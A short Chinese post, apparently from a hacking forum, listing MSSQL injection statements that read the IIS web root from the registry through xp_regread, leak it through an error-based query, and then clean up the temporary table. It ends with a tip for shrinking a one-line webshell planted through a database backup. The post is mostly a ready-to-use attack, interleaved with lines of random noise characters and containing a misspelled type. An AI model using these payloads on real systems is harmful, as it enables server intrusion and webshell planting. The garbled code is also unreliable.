DB权限暴出网站物理路径代码

admin

1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表
( t' p8 F) L9 Y; F- f6 G
$ e3 V' {2 `" h& u6 |3 g! Y
: G! d/ P% ?3 j4 K! `+ _4 O% O+ T　　2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中

8 X) f! v- d" E8 G( J
+ D/ h! V6 F7 x  J/ P　　3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段
6 H0 C, F0 A' V) m

　　4、drop table [jm_tmp]-- 删除此表。
+ p# _$ j: S4 e7 V- X  U
+ c  {5 N/ v" ?* Y; l
另附上备分专用一句话
　　加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.